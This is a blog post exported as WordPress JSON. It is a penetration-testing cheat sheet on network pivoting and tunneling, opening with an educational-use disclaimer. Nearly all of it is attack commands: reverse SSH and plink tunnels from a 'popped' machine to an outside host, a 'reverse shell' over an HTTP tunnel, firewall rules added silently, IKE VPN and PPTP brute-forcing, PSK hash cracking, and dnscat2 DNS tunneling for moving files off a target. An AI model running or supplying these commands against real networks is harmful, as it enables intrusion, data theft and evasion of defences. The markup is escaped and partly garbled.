This is for pure educational & informational purpose. Only use these techniques where allowed or you have permission to do so. Power comes with great responsibility.<\/p>\n\n\n\n
apt-get install rinetd\ncat \/etc\/rinetd.conf # bindadress bindport connectaddress connectport w.x.y.z 53 a.b.c.d 80<\/code><\/pre>\n\n\n\n- SSH Local Port Forwarding: supports bi-directional communication channels<\/li><\/ul>\n\n\n\n
ssh <gateway> -L <local port to listen>:<remote host>:<remote port><\/code><\/pre>\n\n\n\n- SSH Remote Port Forwarding: Suitable for popping a remote shell on an internal non routable network<\/li><\/ul>\n\n\n\n
ssh <gateway> -R <remote port to bind>:<local host>:<local port><\/code><\/pre>\n\n\n\n- SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local attacking box to tunnel ALL incoming traffic to ANY host in the DMZ network on ANY PORT<\/li><\/ul>\n\n\n\n
ssh -D <local proxy port> -p <remote port> <target><\/code><\/pre>\n\n\n\n- Proxychains – Perform Nmap scan within a DMZ from an external computer
- Create a reverse SSH tunnel from the Popped machine on: 2222 <\/li><\/ul><\/li><\/ul>\n\n\n\n
ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com ssh -f -N -R 2222:<local host>:22 root@<remote host><\/code><\/pre>\n\n\n\n- Create a Dynamic application-level port forward on 8080 thru 2222<\/li><\/ul><\/li><\/ul>\n\n\n\n
ssh -f -N -D <local host>:8080 -p 2222 hax0r@<remote host><\/code><\/pre>\n\n\n\n- Leverage the SSH SOCKS server to perform Nmap scan on the network using proxy chains <\/li><\/ul><\/li><\/ul>\n\n\n\n
proxychains nmap --top-ports=20 -sT -Pn $ip\/24<\/code><\/pre>\n\n\n\n- HTTP Tunneling
nc -vvn <\/code><\/li><\/ul>\n\n\n\n$ip 8888<\/code><\/pre>\n\n\n\n- Traffic Encapsulation – Bypassing deep packet inspection
- HTTP tunnel
On the server-side:<\/li><\/ul><\/li><\/ul>\n\n\n\nsudo hts -F <server ip addr>:<port of your app> 80<\/code><\/pre>\n\n\n\n- On the client-side:<\/li><\/ul><\/li><\/ul>\n\n\n\n
sudo htc -P <my proxy.com:proxy port> -F <port of your app> <server ip addr>:80 stunnel<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
- Tunnel Remote Desktop (RDP) from a Popped Windows machine to your network
- Tunnel on port 22<\/li><\/ul><\/li><\/ul>\n\n\n\n
plink -l root -pw pass -R 3389:<localhost>:3389 <remote host><\/code><\/pre>\n\n\n\n-
- Port 22 blocked? Try port 80? or 443? <\/li><\/ul><\/li><\/ul>\n\n\n\n
plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P80<\/code><\/pre>\n\n\n\n- Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel (bypass deep packet inspection)
- Windows machine add required firewall rules without prompting the user<\/li><\/ul><\/li><\/ul>\n\n\n\n
netsh advfirewall firewall add rule name=\"httptunnel_client\" dir=in action=allow program=\"httptunnel_client.exe\" enable=yes<\/code><\/pre>\n\n\n\nnetsh advfirewall firewall add rule name=\"3000\" dir=in action=allow protocol=TCP localport=3000<\/code><\/pre>\n\n\n\nnetsh advfirewall firewall add rule name=\"1080\" dir=in action=allow protocol=TCP localport=1080<\/code><\/pre>\n\n\n\nnetsh advfirewall firewall add rule name=\"1079\" dir=in action=allow protocol=TCP localport=1079<\/code><\/pre>\n\n\n\n- Start the http tunnel client
httptunnel_client.exe<\/code><\/li><\/ul><\/li>- Create HTTP reverse shell by connecting to localhost port 3000
plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P 3000<\/code><\/li><\/ul><\/li><\/ul><\/li>- VLAN Hopping
- git clone https:\/\/github.com\/nccgroup\/vlan-hopping.git chmod 700 frogger.sh .\/frogger.sh<\/li><\/ul><\/li>
- VPN Overtaking
- Identify VPN servers:
.\/udp-protocol-scanner.pl -p ike $ip<\/code><\/li>- Scan a range for VPN servers:
.\/udp-protocol-scanner.pl -p ike -f ip.txt<\/code><\/li>- Use IKEForce to enumerate or dictionary attack VPN servers:
pip install pyip<\/code> git clone https:\/\/github.com\/SpiderLabs\/ikeforce.git<\/code> <\/li>- Perform IKE VPN enumeration with IKEForce:
.\/ikeforce.py TARGET-IP \u2013e \u2013w wordlists\/groupnames.dic<\/code> <\/li>- Bruteforce IKE VPN using IKEForce:
.\/ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1<\/code> <\/li>- Use ike-scan to capture the PSK hash: <\/li><\/ul><\/li><\/ul>\n\n\n\n
ike-scan \nike-scan TARGET-IP \nike-scan -A TARGET-IP \nike-scan -A TARGET-IP --id=myid -P TARGET-IP-key \nike-scan \u2013M \u2013A \u2013n example\\_group -P hash-file.txt TARGET-IP <\/code><\/pre>\n\n\n\nUse psk-crack to crack the PSK hash:\npsk-crack hash-file.txt \npskcrack psk-crack -b 5 TARGET-IPkey \npsk-crack -b 5 --charset=\"01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\" 192-168-207-134key \npsk-crack -d \/path\/to\/dictionary-file TARGET-IP-key<\/code><\/pre>\n\n\n\n- PPTP Overtaking
- Identifying PPTP, it listens on TCP: 1723
NMAP PPTP Fingerprint: nmap \u2013Pn -sV -p 1723 TARGET(S)<\/code> <\/li>- PPTP Dictionary Attack
thc-pptp-bruter -u hansolo -W -w \/usr\/share\/wordlists\/nmap.lst<\/code><\/li><\/ul><\/li>- Port Forwarding\/Redirection<\/li>
- PuTTY Link tunnel – SSH Tunneling
- Forward remote port to local address:
plink.exe -P 22 -l root -pw \"1337\" -R 445:<local host>:445 <remote host><\/code><\/li><\/ul><\/li>- SSH Pivoting
- SSH pivoting from one network to another:
ssh -D <local host>:1010 -p 22 user@<remote host><\/code><\/li><\/ul><\/li>- DNS Tunneling
- dnscat2 supports \u201cdownload\u201d and \u201cupload\u201d commands for getting iles (data and programs) to and from the target machine.<\/li>
- Attacking Machine Installation: apt-get update apt-get -y install ruby-dev git make g++ gem install bundler git clone https:\/\/github.com\/iagox86\/dnscat2.git cd dnscat2\/server bundle install<\/li>
- Run dnscat2:
ruby .\/dnscat2.rb dnscat2> New session established: 1422 dnscat2> session -i 1422<\/code><\/li><\/ul><\/li><\/ul>\n\n\n\nDISCLAIMER: Everything is gathered from different web-resources. Parts of the above writeup belong to unknown authors.<\/p>\n","protected":false},"excerpt":{"rendered":"
This is for pure educational & informational purpose. Only use these techniques where allowed or you have permission to do so. Power comes with great responsibility. Port Forwarding – accept traffic on a given IP address and port and redirect it to a different IP address and port SSH Local Port Forwarding: supports bi-directional communication […]<\/p>\n","protected":false},"author":2,"featured_media":954,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[38],"tags":[48,44,46,47,43,45],"class_list":["post-948","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-how-to","tag-dns-tunnel","tag-network","tag-network-pivot","tag-network-tunnel","tag-pivoting","tag-tunneling"],"_links":{"self":[{"href":"https:\/\/catharsis.net.au\/blog\/wp-json\/wp\/v2\/posts\/948","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/catharsis.net.au\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/catharsis.net.au\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/catharsis.net.au\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/catharsis.net.au\/blog\/wp-json\/wp\/v2\/comments?post=948"}],"version-history":[{"count":16,"href":"https:\/\/catharsis.net.au\/blog\/wp-json\/wp\/v2\/posts\/948\/revisions"}],"predecessor-version":[{"id":968,"href":"https:\/\/catharsis.net.au\/blog\/wp-json\/wp\/v2\/posts\/948\/revisions\/968"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/catharsis.net.au\/blog\/wp-json\/wp\/v2\/media\/954"}],"wp:attachment":[{"href":"https:\/\/catharsis.net.au\/blog\/wp-json\/wp\/v2\/media?parent=948"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/catharsis.net.au\/blog\/wp-json\/wp\/v2\/categories?post=948"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/catharsis.net.au\/blog\/wp-json\/wp\/v2\/tags?post=948"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}